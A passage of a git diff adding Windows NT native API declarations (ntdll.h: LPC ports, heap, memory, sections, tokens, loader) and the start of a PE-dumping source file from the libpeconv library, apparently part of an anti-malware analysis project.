LPC_ERROR_EVENT, // (9) Used by NtRaiseHardError + LPC_CONNECTION_REQUEST // (A) Used by NtConnectPort + +} LPC_TYPE, *PLPC_TYPE; + +// +// Define header for Port Message +// + +typedef struct _PORT_MESSAGE +{ + USHORT DataLength; // Length of data following the header (bytes) + USHORT TotalLength; // Length of data + sizeof(PORT_MESSAGE) + USHORT Type; // Type of the message (See LPC_TYPE enum) + USHORT VirtualRangesOffset; // Offset of array of virtual address ranges + CLIENT_ID ClientId; // Client identifier of the message sender + ULONG MessageId; // Identifier of the particular message instance + union + { + ULONG CallbackId; // + ULONG ClientViewSize; // Size, in bytes, of section created by the sender + }; + +} PORT_MESSAGE, *PPORT_MESSAGE; + +// +// Define structure for initializing shared memory on the caller's side of the port +// + +typedef struct _PORT_VIEW { + + ULONG Length; // 
Size of this structure + HANDLE SectionHandle; // Handle to section object with + // SECTION_MAP_WRITE and SECTION_MAP_READ + ULONG SectionOffset; // The offset in the section to map a view for + // the port data area. The offset must be aligned + // with the allocation granularity of the system. + ULONG ViewSize; // The size of the view (in bytes) + PVOID ViewBase; // The base address of the view in the creator + // + PVOID ViewRemoteBase; // The base address of the view in the process + // connected to the port. +} PORT_VIEW, *PPORT_VIEW; + +// +// Define structure for shared memory coming from remote side of the port +// + +typedef struct _REMOTE_PORT_VIEW { + + ULONG Length; // Size of this structure + ULONG ViewSize; // The size of the view (bytes) + PVOID ViewBase; // Base address of the view + +} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW; + +/*++ + + NtCreatePort + ============ + + Creates an LPC port object. The creator of the LPC port becomes a server + of LPC communication + + PortHandle - Points to a variable that will receive the + port object handle if the call is successful. + + ObjectAttributes - Points to a structure that specifies the object's + attributes. OBJ_KERNEL_HANDLE, OBJ_OPENLINK, OBJ_OPENIF, OBJ_EXCLUSIVE, + OBJ_PERMANENT, and OBJ_INHERIT are not valid attributes for a port object. + + MaxConnectionInfoLength - The maximum size, in bytes, of data that can + be sent through the port. + + MaxMessageLength - The maximum size, in bytes, of a message + that can be sent through the port. + + MaxPoolUsage - Specifies the maximum amount of NonPaged pool that can be used for + message storage. Zero means default value. + + ZwCreatePort verifies that (MaxDataSize <= 0x104) and (MaxMessageSize <= 0x148). 
+ +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtCreatePort( + OUT PHANDLE PortHandle, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG MaxConnectionInfoLength, + IN ULONG MaxMessageLength, + IN ULONG MaxPoolUsage + ); + + +/*++ + + NtConnectPort + ============= + + Creates a port connected to a named port (client side). + + PortHandle - A pointer to a variable that will receive the client + communication port object handle value. + + PortName - Points to a structure that specifies the name + of the port to connect to. + + SecurityQos - Points to a structure that specifies the level + of impersonation available to the port listener. + + ClientView - Optionally points to a structure describing + the shared memory region used to send large amounts of data + to the listener; if the call is successful, this will be updated. + + ServerView - Optionally points to a caller-allocated buffer + or variable that receives information on the shared memory region + used by the listener to send large amounts of data to the + caller. + + MaxMessageLength - Optionally points to a variable that receives the size, + in bytes, of the largest message that can be sent through the port. + + ConnectionInformation - Optionally points to a caller-allocated + buffer or variable that specifies connect data to send to the listener, + and receives connect data sent by the listener. + + ConnectionInformationLength - Optionally points to a variable that + specifies the size, in bytes, of the connect data to send + to the listener, and receives the size of the connect data + sent by the listener. 
+ +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtConnectPort( + OUT PHANDLE PortHandle, + IN PUNICODE_STRING PortName, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, + IN OUT PPORT_VIEW ClientView OPTIONAL, + OUT PREMOTE_PORT_VIEW ServerView OPTIONAL, + OUT PULONG MaxMessageLength OPTIONAL, + IN OUT PVOID ConnectionInformation OPTIONAL, + IN OUT PULONG ConnectionInformationLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwConnectPort( + OUT PHANDLE PortHandle, + IN PUNICODE_STRING PortName, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, + IN OUT PPORT_VIEW ClientView OPTIONAL, + OUT PREMOTE_PORT_VIEW ServerView OPTIONAL, + OUT PULONG MaxMessageLength OPTIONAL, + IN OUT PVOID ConnectionInformation OPTIONAL, + IN OUT PULONG ConnectionInformationLength OPTIONAL + ); + + +/*++ + + NtListenPort + ============ + + Listens on a port for a connection request message on the server side. + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + + ConnectionRequest - Points to a caller-allocated buffer + or variable that receives the connect message sent to + the port. + +--*/ + + +NTSYSAPI +NTSTATUS +NTAPI +NtListenPort( + IN HANDLE PortHandle, + OUT PPORT_MESSAGE RequestMessage + ); + +/*++ + + NtAcceptConnectPort + =================== + + Accepts or rejects a connection request on the server side. + + PortHandle - Points to a variable that will receive the port object + handle if the call is successful. + + PortContext - A numeric identifier to be associated with the port. 
+ + ConnectionRequest - Points to a caller-allocated buffer or variable + that identifies the connection request and contains any connect + data that should be returned to requestor of the connection + + AcceptConnection - Specifies whether the connection should + be accepted or not + + ServerView - Optionally points to a structure describing + the shared memory region used to send large amounts of data to the + requestor; if the call is successful, this will be updated + + ClientView - Optionally points to a caller-allocated buffer + or variable that receives information on the shared memory + region used by the requestor to send large amounts of data to the + caller + +--*/ + + +NTSYSAPI +NTSTATUS +NTAPI +NtAcceptConnectPort( + OUT PHANDLE PortHandle, + IN PVOID PortContext OPTIONAL, + IN PPORT_MESSAGE ConnectionRequest, + IN BOOLEAN AcceptConnection, + IN OUT PPORT_VIEW ServerView OPTIONAL, + OUT PREMOTE_PORT_VIEW ClientView OPTIONAL + ); + +/*++ + + NtCompleteConnectPort + ===================== + + Completes the port connection process on the server side. + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + +--*/ + + +NTSYSAPI +NTSTATUS +NTAPI +NtCompleteConnectPort( + IN HANDLE PortHandle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwCompleteConnectPort( + IN HANDLE PortHandle + ); + + +/*++ + + NtRequestPort + ============= + + Sends a request message to a port (client side) + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + + RequestMessage - Points to a caller-allocated buffer or variable + that specifies the request message to send to the port. + +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtRequestPort ( + IN HANDLE PortHandle, + IN PPORT_MESSAGE RequestMessage + ); + +/*++ + + NtRequestWaitReplyPort + ====================== + + Sends a request message to a port and waits for a reply (client side) + + PortHandle - A handle to a port object. 
The handle doesn't need + to grant any specific access. + + RequestMessage - Points to a caller-allocated buffer or variable + that specifies the request message to send to the port. + + ReplyMessage - Points to a caller-allocated buffer or variable + that receives the reply message sent to the port. + +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtRequestWaitReplyPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE RequestMessage, + OUT PPORT_MESSAGE ReplyMessage + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwRequestWaitReplyPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE RequestMessage, + OUT PPORT_MESSAGE ReplyMessage + ); + + +/*++ + + NtReplyPort + =========== + + Sends a reply message to a port (Server side) + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + + ReplyMessage - Points to a caller-allocated buffer or variable + that specifies the reply message to send to the port. + +--*/ + + +NTSYSAPI +NTSTATUS +NTAPI +NtReplyPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE ReplyMessage + ); + +/*++ + + NtReplyWaitReplyPort + ==================== + + Sends a reply message to a port and waits for a reply message + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + + ReplyMessage - Points to a caller-allocated buffer or variable + that specifies the reply message to send to the port. + +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtReplyWaitReplyPort( + IN HANDLE PortHandle, + IN OUT PPORT_MESSAGE ReplyMessage + ); + + +/*++ + + NtReplyWaitReceivePort + ====================== + + Optionally sends a reply message to a port and waits for a + message + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + + PortContext - Optionally points to a variable that receives + a numeric identifier associated with the port. + + ReplyMessage - Optionally points to a caller-allocated buffer + or variable that specifies the reply message to send to the port. 
+ + ReceiveMessage - Points to a caller-allocated buffer or variable + that receives the message sent to the port. + +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtReplyWaitReceivePort( + IN HANDLE PortHandle, + OUT PVOID *PortContext OPTIONAL, + IN PPORT_MESSAGE ReplyMessage OPTIONAL, + OUT PPORT_MESSAGE ReceiveMessage + ); + +//----------------------------------------------------------------------------- +// Heap functions + +#define HEAP_NO_SERIALIZE 0x00000001 +#define HEAP_GROWABLE 0x00000002 +#define HEAP_GENERATE_EXCEPTIONS 0x00000004 +#define HEAP_ZERO_MEMORY 0x00000008 +#define HEAP_REALLOC_IN_PLACE_ONLY 0x00000010 +#define HEAP_TAIL_CHECKING_ENABLED 0x00000020 +#define HEAP_FREE_CHECKING_ENABLED 0x00000040 +#define HEAP_DISABLE_COALESCE_ON_FREE 0x00000080 +#define HEAP_CREATE_ALIGN_16 0x00010000 +#define HEAP_CREATE_ENABLE_TRACING 0x00020000 +#define HEAP_MAXIMUM_TAG 0x0FFF +#define HEAP_PSEUDO_TAG_FLAG 0x8000 + +// +// Data structure for heap definition. This includes various +// sizing parameters and callback routines, which, if left NULL, +// result in default behavior +// + +typedef struct RTL_HEAP_PARAMETERS { + ULONG Length; //sizeof(RTL_HEAP_PARAMETERS) + ULONG SegmentReserve; + ULONG SegmentCommit; + ULONG DeCommitFreeBlockThreshold; + ULONG DeCommitTotalFreeThreshold; + ULONG MaximumAllocationSize; + ULONG VirtualMemoryThreshold; + ULONG InitialCommit; + ULONG InitialReserve; + PVOID CommitRoutine; + ULONG Reserved; +} RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS; + + +#define RtlProcessHeap() (HANDLE)(NtCurrentTeb()->ProcessEnvironmentBlock->ProcessHeap) + + +NTSYSAPI +HANDLE +NTAPI +RtlCreateHeap ( + IN ULONG Flags, + IN PVOID BaseAddress OPTIONAL, + IN ULONG SizeToReserve, + IN ULONG SizeToCommit, + IN BOOLEAN Lock OPTIONAL, + IN PRTL_HEAP_PARAMETERS Definition OPTIONAL + ); + + +NTSYSAPI +ULONG +NTAPI +RtlDestroyHeap ( + IN HANDLE HeapHandle + ); + + +NTSYSAPI +PVOID +NTAPI +RtlAllocateHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags, + IN ULONG Size + 
); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlFreeHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags, + IN PVOID Address + ); + + +NTSYSAPI +ULONG +NTAPI +RtlCompactHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlLockHeap ( + IN HANDLE HeapHandle + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlUnlockHeap ( + IN HANDLE HeapHandle + ); + + +NTSYSAPI +PVOID +NTAPI +RtlReAllocateHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags, + IN PVOID Address, + IN ULONG Size + ); + + +NTSYSAPI +ULONG +NTAPI +RtlSizeHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags, + IN PVOID Address + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlValidateHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags, + IN PVOID Address OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Virtual memory functions + +NTSYSAPI +NTSTATUS +NTAPI +NtAllocateVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN OUT PULONG RegionSize, + IN ULONG AllocationType, + IN ULONG Protect + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwAllocateVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN OUT PULONG RegionSize, + IN ULONG AllocationType, + IN ULONG Protect + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtFreeVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PULONG RegionSize, + IN ULONG FreeType + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwFreeVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PULONG RegionSize, + IN ULONG FreeType + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtReadVirtualMemory( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + OUT PVOID Buffer, + IN ULONG NumberOfBytesToRead, + OUT PULONG NumberOfBytesRead OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtWriteVirtualMemory( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN PVOID Buffer, + IN ULONG NumberOfBytesToWrite, + OUT PULONG NumberOfBytesWritten OPTIONAL + ); + + 
+//----------------------------------------------------------------------------- +// Section functions + +typedef enum _SECTION_INHERIT +{ + ViewShare = 1, + ViewUnmap = 2 + +} SECTION_INHERIT; + + +typedef enum _SECTION_INFORMATION_CLASS +{ + SectionBasicInformation, + SectionImageInformation + +} SECTION_INFORMATION_CLASS, *PSECTION_INFORMATION_CLASS; + + +/*++ + + NtCreateSection + =============== + + Creates a section object. + + SectionHandle - Points to a variable that will receive the section + object handle if the call is successful. + + DesiredAccess - Specifies the type of access that the caller requires + to the section object. This parameter can be zero, or any combination + of the following flags: + + SECTION_QUERY - Query access + SECTION_MAP_WRITE - Can be written when mapped + SECTION_MAP_READ - Can be read when mapped + SECTION_MAP_EXECUTE - Can be executed when mapped + SECTION_EXTEND_SIZE - Extend access + SECTION_ALL_ACCESS - All of the preceding + + STANDARD_RIGHTS_REQUIRED + + ObjectAttributes - Points to a structure that specifies the object's attributes. + OBJ_OPENLINK is not a valid attribute for a section object. + + MaximumSize - Optionally points to a variable that specifies the size, + in bytes, of the section. If FileHandle is zero, the size must be + specified; otherwise, it can be defaulted from the size of the file + referred to by FileHandle. + + SectionPageProtection - The protection desired for the pages + of the section when the section is mapped. This parameter can take + one of the following values: + + PAGE_READONLY + PAGE_READWRITE + PAGE_WRITECOPY + PAGE_EXECUTE + PAGE_EXECUTE_READ + PAGE_EXECUTE_READWRITE + PAGE_EXECUTE_WRITECOPY + + AllocationAttributes - The attributes for the section. 
This parameter must + be a combination of the following values: + + SEC_BASED 0x00200000 // Map section at same address in each process + SEC_NO_CHANGE 0x00400000 // Disable changes to protection of pages + SEC_IMAGE 0x01000000 // Map section as an image + SEC_VLM 0x02000000 // Map section in VLM region + SEC_RESERVE 0x04000000 // Reserve without allocating pagefile storage + SEC_COMMIT 0x08000000 // Commit pages; the default behavior + SEC_NOCACHE 0x10000000 // Mark pages as non-cacheable + + FileHandle - Identifies the file from which to create the section object. + The file must be opened with an access mode compatible with the protection + flags specified by the Protect parameter. If FileHandle is zero, + the function creates a section object of the specified size backed + by the paging file rather than by a named file in the file system. + +--*/ + + +NTSYSAPI +NTSTATUS +NTAPI +NtCreateSection( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN PLARGE_INTEGER MaximumSize OPTIONAL, + IN ULONG SectionPageProtection, + IN ULONG AllocationAttributes, + IN HANDLE FileHandle OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwCreateSection( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN PLARGE_INTEGER MaximumSize OPTIONAL, + IN ULONG SectionPageProtection, + IN ULONG AllocationAttributes, + IN HANDLE FileHandle OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenSection ( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwOpenSection ( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtMapViewOfSection ( + IN HANDLE SectionHandle, + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN ULONG CommitSize, + IN OUT PLARGE_INTEGER 
SectionOffset OPTIONAL, + IN OUT PULONG ViewSize, + IN SECTION_INHERIT InheritDisposition, + IN ULONG AllocationType, + IN ULONG Protect + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwMapViewOfSection ( + IN HANDLE SectionHandle, + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN ULONG CommitSize, + IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, + IN OUT PULONG ViewSize, + IN SECTION_INHERIT InheritDisposition, + IN ULONG AllocationType, + IN ULONG Protect + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtUnmapViewOfSection ( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwUnmapViewOfSection ( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtExtendSection ( + IN HANDLE SectionHandle, + IN OUT PLARGE_INTEGER SectionSize + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwExtendSection ( + IN HANDLE SectionHandle, + IN OUT PLARGE_INTEGER SectionSize + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQuerySection ( + IN HANDLE SectionHandle, + IN SECTION_INFORMATION_CLASS SectionInformationClass, + OUT PVOID SectionInformation, + IN ULONG Length, + OUT PULONG ResultLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQuerySection ( + IN HANDLE SectionHandle, + IN SECTION_INFORMATION_CLASS SectionInformationClass, + OUT PVOID SectionInformation, + IN ULONG Length, + OUT PULONG ResultLength OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Synchronization + +// +// Wait type +// + +typedef enum _WAIT_TYPE { + WaitAll, + WaitAny + } WAIT_TYPE; + + +NTSYSAPI +NTSTATUS +NTAPI +NtWaitForSingleObject ( + IN HANDLE Handle, + IN BOOLEAN Alertable, + IN PLARGE_INTEGER Timeout OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwWaitForSingleObject ( + IN HANDLE Handle, + IN BOOLEAN Alertable, + IN PLARGE_INTEGER Timeout OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtWaitForMultipleObjects ( + IN ULONG Count, + IN HANDLE Handle[], + IN WAIT_TYPE WaitType, + IN 
BOOLEAN Alertable, + IN PLARGE_INTEGER Timeout OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwWaitForMultipleObjects ( + IN ULONG Count, + IN HANDLE Handle[], + IN WAIT_TYPE WaitType, + IN BOOLEAN Alertable, + IN PLARGE_INTEGER Timeout OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Event support + +typedef enum _EVENT_INFORMATION_CLASS { + EventBasicInformation // = 0 +} EVENT_INFORMATION_CLASS; + +typedef struct _EVENT_BASIC_INFORMATION { + EVENT_TYPE EventType; + LONG EventState; +} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION; + +// +// Event handling routines +// + + +NTSYSAPI +NTSTATUS +NTAPI +NtCreateEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN EVENT_TYPE EventType, + IN BOOLEAN InitialState + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwCreateEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN EVENT_TYPE EventType, + IN BOOLEAN InitialState + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtClearEvent ( + IN HANDLE Handle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwClearEvent ( + IN HANDLE Handle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtPulseEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwPulseEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtResetEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwResetEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwSetEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); 
+ + +NTSYSAPI +NTSTATUS +NTAPI +ZwOpenEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryEvent ( + IN HANDLE EventHandle, + IN EVENT_INFORMATION_CLASS EventInfoClass, + OUT PVOID EventInfo, + IN ULONG Length, + OUT PULONG ResultLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQueryEvent ( + IN HANDLE EventHandle, + IN EVENT_INFORMATION_CLASS EventInfoClass, + OUT PVOID EventInfo, + IN ULONG Length, + OUT PULONG ResultLength OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Security descriptor functions + +NTSYSAPI +NTSTATUS +NTAPI +RtlCreateSecurityDescriptor ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN ULONG Revision + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlSetDaclSecurityDescriptor( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN BOOLEAN DaclPresent, + IN PACL Dacl OPTIONAL, + IN BOOLEAN DaclDefaulted OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlSetOwnerSecurityDescriptor ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN PSID Owner OPTIONAL, + IN BOOLEAN OwnerDefaulted OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAllocateAndInitializeSid( + IN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, + IN UCHAR SubAuthorityCount, + IN ULONG SubAuthority0, + IN ULONG SubAuthority1, + IN ULONG SubAuthority2, + IN ULONG SubAuthority3, + IN ULONG SubAuthority4, + IN ULONG SubAuthority5, + IN ULONG SubAuthority6, + IN ULONG SubAuthority7, + OUT PSID *Sid + ); + + +NTSYSAPI +ULONG +NTAPI +RtlLengthSid ( + IN PSID Sid + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlEqualSid ( + IN PSID Sid1, + IN PSID Sid2 + ); + + +NTSYSAPI +PVOID +NTAPI +RtlFreeSid( + IN PSID Sid + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlCreateAcl( + IN PACL Acl, + IN ULONG AclLength, + IN ULONG AclRevision + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAddAccessAllowedAce( + IN OUT PACL Acl, + IN ULONG AceRevision, + IN ACCESS_MASK AccessMask, + IN 
PSID Sid + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAddAccessAllowedAceEx( + IN OUT PACL Acl, + IN ULONG AceRevision, + IN ULONG AceFlags, + IN ULONG AccessMask, + IN PSID Sid + ); + +//----------------------------------------------------------------------------- +// Token functions + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenProcessToken( + IN HANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + OUT PHANDLE TokenHandle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenThreadToken( + IN HANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN BOOLEAN OpenAsSelf, + OUT PHANDLE TokenHandle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryInformationToken( + IN HANDLE TokenHandle, + IN TOKEN_INFORMATION_CLASS TokenInformationClass, + OUT PVOID TokenInformation, + IN ULONG TokenInformationLength, + OUT PULONG ReturnLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetInformationToken( + IN HANDLE TokenHandle, + IN TOKEN_INFORMATION_CLASS TokenInformationClass, + IN PVOID TokenInformation, + IN ULONG TokenInformationLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtAdjustPrivilegesToken( + IN HANDLE TokenHandle, + IN BOOLEAN DisableAllPrivileges, + IN PTOKEN_PRIVILEGES NewState OPTIONAL, + IN ULONG BufferLength OPTIONAL, + IN PTOKEN_PRIVILEGES PreviousState OPTIONAL, + OUT PULONG ReturnLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDuplicateToken( + IN HANDLE ExistingTokenHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN BOOLEAN EffectiveOnly, + IN TOKEN_TYPE TokenType, + OUT PHANDLE NewTokenHandle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtCompareTokens( + IN HANDLE FirstTokenHandle, + IN HANDLE SecondTokenHandle, + OUT PBOOLEAN IdenticalTokens + ); + + +//----------------------------------------------------------------------------- +// Symbolic links + +// +// Object Manager Symbolic Link Specific Access Rights. 
+// + +#ifndef SYMBOLIC_LINK_QUERY +#define SYMBOLIC_LINK_QUERY (0x0001) +#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) +#endif + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenSymbolicLinkObject ( + OUT PHANDLE SymbolicLinkHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQuerySymbolicLinkObject ( + IN HANDLE SymbolicLinkHandle, + OUT PUNICODE_STRING NameString, + OUT PULONG ResultLength OPTIONAL + ); + +//----------------------------------------------------------------------------- +// Loader functions + +NTSYSAPI +NTSTATUS +NTAPI +LdrGetDllHandle( + IN PWSTR DllPath OPTIONAL, + IN PULONG DllCharacteristics OPTIONAL, + IN PUNICODE_STRING DllName, + OUT PVOID * DllHandle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +LdrGetProcedureAddress( + IN PVOID DllHandle, + IN PANSI_STRING ProcedureName OPTIONAL, + IN ULONG ProcedureNumber OPTIONAL, + OUT PVOID *ProcedureAddress + ); + + +NTSYSAPI +NTSTATUS +NTAPI +LdrLoadDll( + IN PWSTR DllPath OPTIONAL, + IN PULONG DllCharacteristics OPTIONAL, + IN PUNICODE_STRING DllName, + OUT PVOID *DllHandle + ); + +NTSYSAPI +NTSTATUS +NTAPI +LdrFindEntryForAddress( + IN PVOID Address, + OUT PLDR_DATA_TABLE_ENTRY *Module + ); + +NTSYSAPI +VOID +NTAPI + RtlGetCallersAddress( + OUT PVOID *CallersAddress, + OUT PVOID *CallersCaller + ); + +//----------------------------------------------------------------------------- +// Functions dealing with NTSTATUS and Win32 error + +NTSYSAPI +ULONG +NTAPI +RtlNtStatusToDosError( + NTSTATUS Status + ); + + +NTSYSAPI +ULONG +NTAPI +RtlNtStatusToDosErrorNoTeb( + NTSTATUS Status + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlGetLastNtStatus( + ); + + +NTSYSAPI +ULONG +NTAPI +RtlGetLastWin32Error( + ); + + +NTSYSAPI +VOID +NTAPI +RtlSetLastWin32Error( + ULONG WinError + ); + + +NTSYSAPI +VOID +NTAPI +RtlSetLastWin32ErrorAndNtStatusFromNtStatus( + NTSTATUS Status + ); + + 
+//----------------------------------------------------------------------------- +// I/O functions + + +NTSYSAPI +NTSTATUS +NTAPI +NtDisplayString( + IN PUNICODE_STRING String + ); + + +#ifdef __cplusplus +} // extern "C" +#endif + +#endif // __NTDLL_H__ diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_dumper.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_dumper.cpp new file mode 100644 index 0000000..29824c6 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_dumper.cpp @@ -0,0 +1,73 @@ +#include "peconv/pe_dumper.h" + +#include "peconv/pe_hdrs_helper.h" +#include "peconv/pe_virtual_to_raw.h" +#include "peconv/fix_imports.h" +#include "peconv/file_util.h" +#include "peconv/pe_mode_detector.h" +#include "fix_dot_net_ep.h" + +#include + +using namespace peconv; + +t_pe_dump_mode peconv::detect_dump_mode(IN const BYTE* buffer, IN size_t mod_size) +{ + const t_pe_dump_mode default_mode = peconv::PE_DUMP_UNMAP; + if (peconv::is_pe_raw(buffer, mod_size)) { + return peconv::PE_DUMP_VIRTUAL; + } + if (peconv::is_pe_expanded(buffer, mod_size)) { + return peconv::PE_DUMP_REALIGN; + } + return default_mode; +} + +bool peconv::dump_pe(IN const char *out_path, + IN OUT BYTE *buffer, IN size_t mod_size, + IN const ULONGLONG start_addr, + IN OUT t_pe_dump_mode &dump_mode, + IN OPTIONAL const peconv::ExportsMapper* exportsMap +) +{ + // if the exportsMap is supplied, attempt to recover the (destroyed) import table: + if (exportsMap != nullptr) { + if 